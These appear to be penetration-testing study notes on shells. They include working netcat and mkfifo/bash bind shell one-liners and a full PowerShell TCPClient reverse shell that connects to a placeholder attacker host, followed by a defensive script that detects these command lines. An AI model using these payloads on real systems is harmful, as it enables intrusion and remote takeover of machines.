# Anatomy of Shell

- command-line interfaces = a combination of the operating system, terminal emulator application, and the command language interpreter
- command language interpreter = bash, ksh, zsh

| **Terminal Emulator**                                          | **Operating System**     |
| :------------------------------------------------------------- | :----------------------- |
| [Windows Terminal](https://github.com/microsoft/terminal)      | Windows                  |
| [cmder](https://cmder.app/)                                    | Windows                  |
| [PuTTY](https://www.putty.org/)                                | Windows                  |
| [kitty](https://sw.kovidgoyal.net/kitty/)                      | Windows, Linux and MacOS |
| [Alacritty](https://github.com/alacritty/alacritty)            | Windows, Linux and MacOS |
| [xterm](https://invisible-island.net/xterm/)                   | Linux                    |
| [GNOME Terminal](https://en.wikipedia.org/wiki/GNOME_Terminal) | Linux                    |
| [MATE Terminal](https://github.com/mate-desktop/mate-terminal) | Linux                    |
| [Konsole](https://konsole.kde.org/)                            | Linux                    |
| [Terminal](https://en.wikipedia.org/wiki/Terminal_\(macOS\))   | MacOS                    |
| [iTerm2](https://iterm2.com/)                                  | MacOS                    |

## Shell Validation in BASH

```bash
ps #shows running processes including one for the current terminal emulator
env #shows which shell is bound to the SHELL variable
uname -a #shows kernel, os, and architecture info
```

## Shell Validation in PowerShell

```powershell
$PSVersionTable #shows PS version, OS, platform info
```

# Bind Shells

- Kali host connects to a listener on the target
- requires active listener on target as well as associated ip address and port

## Example with GNU Netcat (nc) on Server

```bash
#setup listener on target
nc -lvnp 7777
```

```bash
#connect to listener from Kali host to establish a bind shell
nc -nv <target_ip> 7777
```

- this is *not* a proper shell, only a TCP session that can send messages from Kali host to target

## Example with Binding Bash Shell to TCP Session on Server

```bash
#setup listener on target
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <target_ip> 7777 > /tmp/f
```

```bash
#connect to listener from Kali host to establish a bind shell
nc -nv <target_ip> 7777
```

# Reverse Shells

- Connect to listener on Kali host from target
- Requires listener on Kali host and target to execute a payload to reach out to listener

## Example RevShell from Windows

```bash
#setup listener on Kali host
sudo nc -lvnp 443
```

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<kali_host_ip>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

```cmd-session
powershell -nop -c
```
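
A defender-side check for the command lines shown in these notes, as an added example that is not part of the original notes: it labels process command lines (for instance from process-creation audit logs) that match the netcat listener, the FIFO-backed bash bind shell, or the PowerShell `TCPClient` one-liner. The function names, labels and sample lines are constructed for illustration; addresses use the 192.0.2.0/24 documentation range.

```bash
#!/bin/sh
# Added example: label command lines that match the shell patterns in these notes.
# Function names, labels and sample lines are constructed for illustration.

# has TEXT REGEX: case-insensitive extended-regex match
has() { printf '%s\n' "$1" | grep -Eiq -- "$2"; }

# netcat started with a listen flag (-l, -lvnp, -v -l, ...)
NC_LISTEN='(^|[^[:alnum:]_])(nc|ncat|netcat)([[:space:]]+-[[:alnum:]]+)*[[:space:]]+-[[:alnum:]]*l'
# an interactive shell such as "/bin/bash -i"
SH_INTERACTIVE='(^|[^[:alnum:]_])(ba|da|z|k)?sh[[:space:]]+-i'
# PowerShell evaluating received text
PS_EVAL='(^|[^[:alnum:]_])(iex|Invoke-Expression)([^[:alnum:]_]|$)'

classify_cmdline() {
  if has "$1" 'mkfifo' && has "$1" "$SH_INTERACTIVE" && has "$1" "$NC_LISTEN"; then
    echo fifo-bind-shell      # named pipe + interactive shell + listener
  elif has "$1" 'System\.Net\.Sockets\.TCPClient' && has "$1" "$PS_EVAL"; then
    echo ps-tcp-revshell      # raw TCP client whose input is evaluated
  elif has "$1" "$NC_LISTEN"; then
    echo nc-listener          # plain listener, no shell attached
  else
    echo none
  fi
}

# Read command lines on stdin, print "label<TAB>command line" for each hit.
scan_cmdlines() {
  while IFS= read -r line; do
    label=$(classify_cmdline "$line")
    if [ "$label" != none ]; then printf '%s\t%s\n' "$label" "$line"; fi
  done
}

# Constructed sample: one command line per row, "..." marks elided text.
sample_cmdlines() {
  cat <<'EOF'
uname -a
nc -nv 192.0.2.20 7777
sudo nc -lvnp 443
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 192.0.2.20 7777 > /tmp/f
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10',443); ... (iex $data 2>&1 | Out-String ) ..."
rsync -al /srv/ backup:/srv/
EOF
}

sample_cmdlines | scan_cmdlines
```

A bare `nc-listener` hit is also what a legitimate port test looks like, so treat it as a lead to correlate with the parent process and the listening port rather than a verdict.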